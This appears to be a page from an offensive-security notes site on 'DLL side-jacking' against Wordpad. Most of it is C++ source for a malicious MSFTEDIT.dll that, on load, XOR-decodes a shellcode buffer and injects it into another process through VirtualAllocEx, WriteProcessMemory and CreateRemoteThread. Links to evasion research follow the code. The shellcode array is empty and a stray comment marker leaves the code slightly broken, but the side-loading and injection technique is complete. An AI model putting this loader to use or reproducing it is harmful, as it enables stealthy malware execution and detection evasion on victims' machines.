DLL Side-Jacking

MSFTEDIT.dll - Wordpad Sidejacking

// dllmain.cpp : Defines the entry point for the DLL application.
#include <iostream>
#include <string>
#include <Windows.h>

extern "C" __declspec(dllexport) bool InitCrashHandler()
{
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}

extern "C" __declspec(dllexport) bool SendReport()
{
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}

extern "C" __declspec(dllexport) bool IsReadyToExit()
{
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}

extern "C" __declspec(dllexport) bool SetCustomInfo()
{
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}

extern "C" __declspec(dllexport) bool AddUserInfoToReport()
{
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}
extern "C" __declspec(dllexport) bool AddFileToReport()
{
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}
extern "C" __declspec(dllexport) bool RemoveFileFromReport()
{
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}
extern "C" __declspec(dllexport) bool GetVersionFromApp()
{
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}
extern "C" __declspec(dllexport) bool GetVersionFromFile()
{
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}

*/
//testing creating a new thread from DLL Main
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{

	//MessageBoxA(NULL, "hello", "hi", 0x0000000L);
	unsigned char eShellcode[] =
		"";


/*
char un[32];
DWORD buf = 32;
GetUserNameA(un, &buf);


char hn[32];
DWORD buf2 = 32;
GetComputerNameA(hn, &buf2);
*/
//std::string key = hn;
//std::string key = un;
std::string key = "zyvdx";


unsigned char shellcode[sizeof(eShellcode)];
for (int ii = 0; ii < key.length(); ii++) {
	for (int i = 0; i < sizeof eShellcode; i++) {
		shellcode[i] = eShellcode[i] ^ key[ii];
		eShellcode[i] = shellcode[i];
	}
}

for (int ii = 0; ii < key.length(); ii++) {
	for (int i = 0; i < sizeof eShellcode;) {
		shellcode[i] = eShellcode[i] ^ key[ii];
		eShellcode[i] = shellcode[i];
		i = i + 2;
	}
}
//*/
	HANDLE processHandle;
	HANDLE remoteThread;
	PVOID remoteBuffer;

	processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi("6672"))); //can also use PROCESS_VM_WRITE then PROCESS_CREATE_THREAD
	remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
	remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	CloseHandle(processHandle);
	MessageBoxA(NULL, "Preprocess", "hi", 0x0000000L);


	return 1;
}




BOOL __stdcall DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved)
{

	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	{
		MessageBoxA(NULL, "RunPot", "hi", 0x0000000L);
		HANDLE threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
		//MessageBoxA(NULL, "RunPot", "hi", 0x0000000L);
		CloseHandle(threadHandle);


	}
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

https://gist.github.com/securitytube/c956348435cc90b8e1f7 https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html https://github.com/fireeye/DueDLLigence https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/ https://www.fireeye.com/blog/threat-research/2020/01/abusing-dll-misconfigurations.html

MSFTEDIT Side Jack With Process Enumeration

PreviousProcess Enumeration and Injection With Parent Process Name CheckNextExcel 4.0 Macros

Last updated

Was this helpful?